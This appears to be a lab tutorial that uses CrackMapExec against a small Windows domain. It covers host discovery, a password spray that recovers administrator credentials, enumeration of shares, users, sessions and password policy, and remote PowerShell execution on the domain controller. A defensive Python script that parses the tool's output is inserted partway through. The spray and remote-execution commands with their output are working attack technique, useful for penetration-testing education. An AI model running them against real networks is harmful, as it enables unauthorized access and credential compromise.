root@securitynik:# apt-get install crackmapexec
Now that it is installed, we can start by looking at the help.
root@securitynik:/cme# crackmapexec --help
usage: crackmapexec [-h] [-v] [-t THREADS] [-id CRED_ID [CRED_ID ...]] [-u USERNAME [USERNAME ...]]
                    [-d DOMAIN | --local-auth] [-p PASSWORD [PASSWORD ...] | -H HASH [HASH ...]]
                    [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L] [--show-options]
                    [--share SHARE] [--smb-port {139,445}] [--mssql-port PORT] [--server {http,https}]
                    [--server-host HOST] [--server-port PORT] [--timeout TIMEOUT]
                    [--gfail-limit LIMIT | --ufail-limit LIMIT | --fail-limit LIMIT] [--verbose]
                    [--sam] [--lsa] [--ntds {vss,drsuapi}] [--ntds-history] [--ntds-pwdLastSet]
                    [--wdigest {enable,disable}] [--shares] [--uac] [--sessions] [--disks] [--users]
                    [--rid-brute [MAX_RID]] [--pass-pol] [--lusers] [--wmi QUERY]
                    [--wmi-namespace NAMESPACE] [--spider [FOLDER]] [--content]
                    [--exclude-dirs DIR_LIST] [--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]]
                    [--depth DEPTH] [--exec-method {smbexec,wmiexec,atexec}] [--force-ps32] [--no-output]
                    [-x COMMAND | -X PS_COMMAND] [--mssql] [--mssql-query QUERY]
                    [--mssql-auth {windows,normal}] [target [target ...]]
.... <truncated for brevity> ....
Now that we have the help, let's see what we can learn about the remote hosts within our subnet. Without any credentials, here is what we are able to see:
root@securitynik:/cme# crackmapexec 10.0.0.100/24
CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
[*] KTHXBYE!
From above, we see that without any credentials, we were able to identify 3 hosts on the 10.0.0.0/24 subnet. Let's now add those hosts to a file which we can use in the future.
root@securitynik:/cme# echo 10.0.0.103 >> cme-hosts.txt
root@securitynik:/cme# echo 10.0.0.3 >> cme-hosts.txt
root@securitynik:/cme# echo 10.0.0.105 >> cme-hosts.txt
root@securitynik:/cme# crackmapexec cme-hosts.txt
CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
[*] KTHXBYE!
Now that we have a file consisting of the hosts, let's see what else we can figure out. First, let's try to enumerate the shares:
root@securitynik:/# crackmapexec cme-hosts.txt --shares
CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
[*] KTHXBYE!
The above does not look any different from what we had previously. Let's see what happens if we add some usernames and passwords to a file.
Let's add the usernames to the text file first.
root@securitynik:/cme# echo administrator >> username.txt
root@securitynik:/cme# echo nakia >> username.txt
root@securitynik:/cme# echo neysa >> username.txt
root@securitynik:/cme# echo securitynik >> username.txt
root@securitynik:/cme# echo saadia >> username.txt
Now let's add the passwords to a file.
root@securitynik:/cme# echo password >> password.txt
root@securitynik:/cme# echo password >> password.txt
root@securitynik:/cme# echo GuessMe >> password.txt
root@securitynik:/cme# echo Testing1 >> password.txt
Let's try a password spraying attack to see if one of the passwords in the "password.txt" file works for one or more of the usernames in the "username.txt" file. At the same time, let's enumerate the shares on any host we are able to successfully authenticate against.
root@securitynik:/cme# crackmapexec cme-hosts.txt -u username.txt -p password.txt --shares
CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE
CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:Yahooecho password STATUS_LOGON_FAILURE
CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE
CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:GuessMe STATUS_LOGON_FAILURE
CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:password STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:Yahooecho password STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:password STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:GuessMe STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:Testing1 STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:password STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:Yahooecho password STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:password STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:GuessMe STATUS_LOGON_FAILURE
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:Testing1 STATUS_LOGON_FAILURE
CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE
CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\neysa:Yahooecho password STATUS_LOGON_FAILURE
CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE
CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\neysa:GuessMe STATUS_LOGON_FAILURE
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\neysa:Testing1
CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating shares
CME 10.0.0.103:445 SECURITYNIK-WIN SHARE           Permissions
CME 10.0.0.103:445 SECURITYNIK-WIN -----           -----------
CME 10.0.0.103:445 SECURITYNIK-WIN ShareFolder     READ, WRITE
CME 10.0.0.103:445 SECURITYNIK-WIN ADMIN$          READ, WRITE
CME 10.0.0.103:445 SECURITYNIK-WIN IPC$            READ
CME 10.0.0.103:445 SECURITYNIK-WIN C$              READ, WRITE
CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating shares
CME 10.0.0.105:445 SECNIK-2K19 SHARE           Permissions
CME 10.0.0.105:445 SECNIK-2K19 -----           -----------
CME 10.0.0.105:445 SECNIK-2K19 NETLOGON        READ
CME 10.0.0.105:445 SECNIK-2K19 SYSVOL          READ
CME 10.0.0.105:445 SECNIK-2K19 ADMIN$          NO ACCESS
CME 10.0.0.105:445 SECNIK-2K19 IPC$            READ
CME 10.0.0.105:445 SECNIK-2K19 C$              NO ACCESS
[*] KTHXBYE!
From above, we see that the different passwords were tried and, ultimately, we were successful using the password "Testing1" with the username "administrator" on the host "SECURITYNIK-WIN". The "(Pwn3d!)" above tells us this system is owned. Think admin privileges.
At the same time, we see we were also able to determine that the credentials for "neysa" are "Testing1" on the host "SECNIK-2K19".
Now that we know we have credentials that work, let's focus on using "administrator" and "Testing1" for the rest of our activities.
Let's continue enumerating the hosts.
Let's first start by testing whether or not User Account Control (UAC) is enabled.
root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --uac
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE
CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating UAC status
CME 10.0.0.105:445 SECNIK-2K19 1 - UAC Enabled
.... <error occurred here> ...
CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating UAC status
CME 10.0.0.103:445 SECURITYNIK-WIN 1 - UAC Enabled
[*] KTHXBYE!
From above, we see UAC is enabled on hosts "10.0.0.105:445 SECNIK-2K19" and "10.0.0.103:445 SECURITYNIK-WIN".
Let's continue enumerating. This time let's enumerate the disks on the hosts.
root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --disks
CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE
CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating disks
CME 10.0.0.103:445 SECURITYNIK-WIN C:
CME 10.0.0.103:445 SECURITYNIK-WIN D:
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating disks
CME 10.0.0.105:445 SECNIK-2K19 C:
CME 10.0.0.105:445 SECNIK-2K19 D:
[*] KTHXBYE!
From above, we see that both "10.0.0.103:445 SECURITYNIK-WIN" and "10.0.0.105:445 SECNIK-2K19" are reporting that they have both a "C:" and a "D:" drive.
We are also able to enumerate existing sessions on the hosts as shown below:
root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --sessions
CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE
CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating active sessions
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating active sessions
[*] KTHXBYE!
Let's now enumerate the users on the systems:
root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --users
CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME 10.0.0.103:445 SECURITYNIK-WIN [+] Dumping users
CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/FullName:
CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/UserComment:
CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/PrimaryGroupId: 513
CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/BadPasswordCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/LogonCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/FullName:
CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/UserComment:
CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/PrimaryGroupId: 513
CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/BadPasswordCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/LogonCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/FullName:
CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/UserComment:
CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/PrimaryGroupId: 513
CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/BadPasswordCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/LogonCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/FullName:
CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/UserComment:
CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/PrimaryGroupId: 513
CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/BadPasswordCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/LogonCount: 7
CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/FullName:
CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/UserComment:
CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/PrimaryGroupId: 513
CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/BadPasswordCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/LogonCount: 83
CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/FullName:
CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/UserComment:
CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/PrimaryGroupId: 513
CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/BadPasswordCount: 0
CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping users
CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/FullName:
CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/PrimaryGroupId: 513
CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/LogonCount: 33
CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/FullName:
CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/PrimaryGroupId: 514
CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/FullName:
CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/PrimaryGroupId: 513
CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/FullName: nakia
CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/PrimaryGroupId: 513
CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/FullName: neysa
CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/PrimaryGroupId: 513
CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/FullName: securitynik
CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/PrimaryGroupId: 513
CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/FullName: saadia
CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/PrimaryGroupId: 513
CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/FullName: nik
CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/PrimaryGroupId: 513
CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/FullName:
CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/UserComment:
CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/PrimaryGroupId: 513
CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/BadPasswordCount: 0
CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/LogonCount: 0
From above, we can conclude that the device at "10.0.0.105:445 SECNIK-2K19" is more than likely an Active Directory domain controller. Now that we know what this device is, let's enumerate the domain policy:
root@securitynik:/cme# crackmapexec 10.0.0.105 --pass-pol -u administrator -p Testing1
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping password policy
CME 10.0.0.105:445 SECNIK-2K19 Minimum password length: 7
CME 10.0.0.105:445 SECNIK-2K19 Password history length: 24
CME 10.0.0.105:445 SECNIK-2K19 Maximum password age: 41 days 23 hours 52 minutes
CME 10.0.0.105:445 SECNIK-2K19 Minimum password age: 23 hours 52 minutes
CME 10.0.0.105:445 SECNIK-2K19 Account lockout threshold: 0
CME 10.0.0.105:445 SECNIK-2K19 Account lockout duration: None
[*] KTHXBYE!
From above, an attacker now has tremendous visibility into the users in the domain as well as information on the password policy to mount an effective password-based attack. Realistically, we already have the administrator credentials. However, the information above is still helpful.
Let's do our final enumeration to list the currently logged on users on the host at "10.0.0.105:445 SECNIK-2K19", which is reporting as a domain controller.
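As an added example (not part of this post or of CrackMapExec), here is a small Python triage script that parses the "CME <ip>:<port> <NAME> <message>" line format shown above, from the spray results and share listing to the user dump and the password policy, and pulls out what a reviewer acts on: which accounts accepted a password and whether CME flagged them "(Pwn3d!)", the "krbtgt" account that marks a domain controller, and the lockout threshold of 0 that lets failed logons continue without ever locking an account. The sample lines, the HostReport type and the 14-character length baseline are constructed for this example.

```python
"""Triage helper for the "CME <ip>:<port> <NAME> <msg>" lines CrackMapExec prints (added example, not part of CME)."""
import re
from dataclasses import dataclass, field

# Constructed sample in the shape of the post's transcripts, not the full output.
SAMPLE_OUTPUT = """\
CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\\administrator:password STATUS_LOGON_FAILURE
CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\\neysa:GuessMe STATUS_LOGON_FAILURE
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\\neysa:Testing1
CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating shares
CME 10.0.0.103:445 SECURITYNIK-WIN SHARE           Permissions
CME 10.0.0.103:445 SECURITYNIK-WIN ShareFolder     READ, WRITE
CME 10.0.0.103:445 SECURITYNIK-WIN ADMIN$          READ, WRITE
CME 10.0.0.103:445 SECURITYNIK-WIN IPC$            READ
CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping users
CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/LogonCount: 33
CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/LogonCount: 0
CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/FullName: neysa
CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping password policy
CME 10.0.0.105:445 SECNIK-2K19 Minimum password length: 7
CME 10.0.0.105:445 SECNIK-2K19 Account lockout threshold: 0
[*] KTHXBYE!
"""

LINE_RE = re.compile(r"^CME\s+(?P<ip>\S+):(?P<port>\d+)\s+(?P<name>\S+)\s+(?P<msg>.*)$")
# "[+] DOMAIN\user:secret (Pwn3d!)"  or  "[-] DOMAIN\user:secret STATUS_LOGON_FAILURE"
AUTH_RE = re.compile(r"^\[(?P<flag>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):"
                     r"(?P<secret>\S+)\s*(?P<status>.*)$")
SHARE_RE = re.compile(r"^(?P<share>\S+)\s+(?P<perm>READ, WRITE|NO ACCESS|READ|WRITE)$")
USER_RE = re.compile(r"^(?P<user>\S+)\s+\((?P<rid>\d+)\)/(?P<attr>\w+):\s*(?P<value>.*)$")
POLICY_RE = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]+):\s+(?P<value>.+)$")

MIN_LENGTH_BASELINE = 14  # assumed baseline for this example, not something CME reports

@dataclass
class HostReport:
    ip: str
    name: str
    valid_logins: list = field(default_factory=list)  # (DOMAIN\user, is_admin)
    failed_logins: int = 0
    shares: dict = field(default_factory=dict)        # share -> permissions
    users: dict = field(default_factory=dict)         # user -> RID
    policy: dict = field(default_factory=dict)        # setting -> raw value

    @property
    def likely_domain_controller(self) -> bool:
        # krbtgt only exists in Active Directory, so a dump containing it came from a DC.
        return "krbtgt" in self.users

def parse_cme_output(text: str) -> dict:
    """Return {ip: HostReport}; failed secrets are counted but never stored."""
    reports = {}
    for raw in text.splitlines():
        line = LINE_RE.match(raw)
        if not line:
            continue  # "[*] KTHXBYE!" and other lines without a host prefix
        rep = reports.setdefault(line["ip"], HostReport(line["ip"], line["name"]))
        msg = line["msg"].strip()
        if m := AUTH_RE.match(msg):
            if m["flag"] == "+":
                # CME appends "(Pwn3d!)" when the account is an admin on that host.
                rep.valid_logins.append((f"{m['domain']}\\{m['user']}", "Pwn3d!" in m["status"]))
            else:
                rep.failed_logins += 1
        elif m := SHARE_RE.match(msg):
            rep.shares[m["share"]] = m["perm"]
        elif m := USER_RE.match(msg):
            rep.users[m["user"]] = int(m["rid"])
        elif m := POLICY_RE.match(msg):
            rep.policy[m["key"]] = m["value"]
    return reports

def assess_policy(policy: dict) -> list:
    """Flag the settings that let a spray like the one above run without hindrance."""
    findings = []
    if policy.get("Account lockout threshold") == "0":
        findings.append("lockout threshold 0: failed logons never lock an account, "
                        "so only logon-failure auditing would reveal a spray")
    length = policy.get("Minimum password length")
    if length is not None and int(length) < MIN_LENGTH_BASELINE:
        findings.append(f"minimum password length {length} is below the "
                        f"{MIN_LENGTH_BASELINE}-character baseline")
    return findings

def summarize(reports: dict) -> list:
    """One line per host plus one line per policy finding."""
    lines = []
    for rep in reports.values():
        admins = sum(1 for _, is_admin in rep.valid_logins if is_admin)
        role = ", likely domain controller" if rep.likely_domain_controller else ""
        lines.append(f"{rep.ip} ({rep.name}): {len(rep.valid_logins)} valid login(s), "
                     f"{admins} with admin rights, {rep.failed_logins} failed, "
                     f"{len(rep.shares)} share(s) listed{role}")
        lines.extend(f"  policy: {finding}" for finding in assess_policy(rep.policy))
    return lines

if __name__ == "__main__":
    print("\n".join(summarize(parse_cme_output(SAMPLE_OUTPUT))))
```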
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --lusers
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating logged on users
CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\Administrator LogonServer: SECNIK-2K19
CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$
CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$
CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$
CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$
CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$
CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$
CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$
From above we can conclude that the username "Administrator" is currently logged on. The account "SECNIK-2K19$" represents the computer account. Note the "$" at the end.
Now that we have enumerated the various information from the hosts, let's now stick with the domain controller.
Let's run a PowerShell command to get the list of processes running on the host.
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -X get-process
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Executed command
CME 10.0.0.105:445 SECNIK-2K19 #< CLIXML
CME 10.0.0.105:445 SECNIK-2K19
CME 10.0.0.105:445 SECNIK-2K19 Handles NPM(K) PM(K)  WS(K)  CPU(s)  Id   SI ProcessName
CME 10.0.0.105:445 SECNIK-2K19 ------- ------ -----  -----  ------  --   -- -----------
CME 10.0.0.105:445 SECNIK-2K19 84      6      2824   992    0.17    840  1  cmd
CME 10.0.0.105:445 SECNIK-2K19 76      5      3280   3708   0.02    4696 0  cmd
CME 10.0.0.105:445 SECNIK-2K19 251     13     8036   1212   3.34    4088 1  conhost
CME 10.0.0.105:445 SECNIK-2K19 147     9      7112   12512  0.05    4912 0  conhost
CME 10.0.0.105:445 SECNIK-2K19 330     13     2172   5572   0.66    352  0  csrss
CME 10.0.0.105:445 SECNIK-2K19 304     15     2204   5192   0.61    424  1  csrss
CME 10.0.0.105:445 SECNIK-2K19 395     15     5472   17024  0.78    3024 1  ctfmon
CME 10.0.0.105:445 SECNIK-2K19 381     32     16200  21988  5.03    1996 0  dfsrs
CME 10.0.0.105:445 SECNIK-2K19 191     13     2584   7700   0.03    1160 0  dfssvc
CME 10.0.0.105:445 SECNIK-2K19 215     16     3288   11392  0.06    2416 1  dllhost
CME 10.0.0.105:445 SECNIK-2K19 10366   7411   129432 128224 2.23    3472 0  dns
CME 10.0.0.105:445 SECNIK-2K19 647     48     67024  123304 30.19   856  1  dwm
CME 10.0.0.105:445 SECNIK-2K19 1805    78     63140  11888  21.97   3000 1  explorer
....
CME 10.0.0.105:445 SECNIK-2K19 54      4      728    3156   0.03    1676 0  wlms
CME 10.0.0.105:445 SECNIK-2K19 369     20     11468  22504  0.70    168  0  WmiPrvSE
